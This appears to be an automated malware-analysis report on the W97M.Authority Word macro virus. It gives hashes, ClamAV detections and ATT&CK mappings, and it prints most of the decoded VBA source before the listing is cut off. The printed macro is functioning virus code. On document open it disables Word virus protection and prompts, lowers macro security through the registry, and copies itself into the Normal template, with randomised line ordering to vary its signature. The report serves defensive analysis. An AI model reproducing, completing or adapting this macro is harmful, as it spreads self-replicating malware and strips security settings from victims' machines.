W97M.Authority Office (OLE) malware analysis — malicious · 938f4ad0ebd68d30

MALICIOUS

Office (OLE)

36.5 KB Created: 2003-01-03 11:33:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 0353cb4022e7577f5d0c184cf574b575 SHA-1: 424372e57e5bbb9949fa83aac6c970ffb51270a7 SHA-256: 938f4ad0ebd68d3016c628b89067a3842519a8f9bf0b97e8bdeb0c7e4ff2c8fb

180 Risk Score

Malware Insights

W97M.Authority · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro designed to disable macro security settings. It attempts to write to registry keys 'HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security' to lower security levels. This is a common technique for macro-based malware to facilitate the execution of further malicious code.

Heuristics 3

ClamAV: Doc.Trojan.Aurity-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Aurity-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5921 bytes
SHA-256: `c91ac8724ec52fd4db7ec83a256ff23a85898d656b80a294230e75f8ce859c68`
Detection ClamAV: Doc.Trojan.Aurity-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Authority > ÌÒÖÑÌÑÈÈÊÙÒØÆßàÍÞÉÍ Private Sub Document_Open() On Error Resume Next With Options .VirusProtection = False: .SaveNormalPrompt = False: .ConfirmConversions = False End With SoftwareKey = "HKEY_CURRENT_USER\Software\Microsoft\Office\" SecurityKey = Application.Version & "\Word\Security" OfficeKey = SoftwareKey & SecurityKey For CLoop = 0 To 1 KeyArray = Array("Level", "AccessVBOM") System.PrivateProfileString("", OfficeKey, KeyArray(CLoop)) = 1& Next CLoop Set DocTT = ActiveDocument.VBProject.VBComponents(1).CodeModule Set DocNT = NormalTemplate.VBProject.VBComponents(1).CodeModule TTMarker = Left(DocTT.Lines(1, 1), 13) NTMarker = Left(DocNT.Lines(1, 1), 13) Randomize For RLoop = 1 To Int((30 * Rnd) + 1) Randomize If Int((2 * Rnd) + 1) = 1 Then RCase = 199 Else RCase = 197 End If Randomize R = R & Chr(Int((26 * Rnd) + RCase)) Next If TTMarker <> "'Authority > " Then Do e = e + 1 NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf Loop Until e = DocNT.CountOfLines DocTT.DeleteLines 1, DocTT.CountOfLines DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2) DocTT.ReplaceLine 1, "'Authority > " & R DocTT.ReplaceLine 2, "Private Sub Document_Open()" TTC = True End If If NTMarker <> "'Authority > " Then Do C = C + 1 TTLines = TTLines & DocTT.Lines(C, 1) & vbCrLf Loop Until C = DocTT.CountOfLines DocNT.DeleteLines 1, DocNT.CountOfLines DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2) DocNT.ReplaceLine 1, "'Authority > " & R DocNT.ReplaceLine 2, "Private Sub Document_Close()" NTC = True End If If TTC = True Then Randomize If Int((2 * Rnd) + 1) = 1 Then C1 = 29: C2 = 30: C3 = 31: C4 = 32: C5 = 33: C6 = 34 C7 = 35: C8 = 36: C9 = 37: C10 = 38: C11 = 39 K1 = 40: K2 = 41: K3 = 42: K4 = 43: K5 = 44: K6 = 45 K7 = 46: K8 = 47: K9 = 48: K10 = 49: K11 = 50 Else C1 = 40: C2 = 41: C3 = 42: C4 = 43: C5 = 44: C6 = 45 C7 = 46: C8 = 47: C9 = 48: C10 = 49: C11 = 50 K1 = 29: K2 = 30: K3 = 31: K4 = 32: K5 = 33: K6 = 34 K7 = 35: K8 = 36: K9 = 37: K10 = 38: K11 = 39 End If With DocTT .ReplaceLine C1, "If TTMarker <> ""'Authority > "" Then" .ReplaceLine C2, "Do" .ReplaceLine C3, "e = e + 1" .ReplaceLine C4, "NTLines = NTLines & DocNT.Lines(e, 1) & vbCrLf" .ReplaceLine C5, "Loop Until e = DocNT.CountOfLines" .ReplaceLine C6, "DocTT.DeleteLines 1, DocTT.CountOfLines" .ReplaceLine C7, "DocTT.InsertLines 1, Left(NTLines, Len(NTLines) - 2)" .ReplaceLine C8, "DocTT.ReplaceLine 1, ""'Authority > "" & R" .ReplaceLine C9, "DocTT.ReplaceLine 2, ""Private Sub Document_Open()""" .ReplaceLine C10, "TTC = True" .ReplaceLine C11, "End If" .ReplaceLine K1, "If NTMarker <> ""'Authority > "" Then" .ReplaceLine K2, "Do" .ReplaceLine K3, "c = c + 1" .ReplaceLine K4, "TTLines = TTLines & DocTT.Lines(c, 1) & vbCrLf" .ReplaceLine K5, "Loop Until c = DocTT.CountOfLines" .ReplaceLine K6, "DocNT.DeleteLines 1, DocNT.CountOfLines" .ReplaceLine K7, "DocNT.InsertLines 1, Left(TTLines, Len(TTLines) - 2)" .ReplaceLine K8, "DocNT.ReplaceLine 1, ""'Authority > "" & R" .ReplaceLine K9, "DocNT.ReplaceLine 2, ""Private Sub Document_Close()""" .ReplaceLine K10, "NTC = True" .ReplaceLine K11, "End If" End With E1 = "VirusProtection" E2 = "SaveNormalPrompt" E3 = "ConfirmConversions" EF = " = False" EN = ": ." Randomize Select Case Int((6 * Rnd) + 1) Case 1: RL = Chr(46) & E1 & EF & EN & E2 & EF & EN & E3 & EF Case 2: RL = Chr(46) & E1 & EF & EN & E3 & EF & EN & E2 & EF Case 3: RL = Chr(46) & E2 & EF & EN & E1 & EF & EN & E3 & EF Case 4: RL = Chr(46) & E2 & EF & EN & E3 & EF & EN & E1 & EF Case 5: RL = Chr(46) & E3 & EF & EN & E1 & EF & EN & E2 & EF Case 6: RL = Chr(46) & E3 & EF & EN & E2 & EF & EN & E1 & EF End Select DocTT.ReplaceLine 5, RL RC1 = ".VBProject.VBComponents(1).CodeModule" RC2 = "Set ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.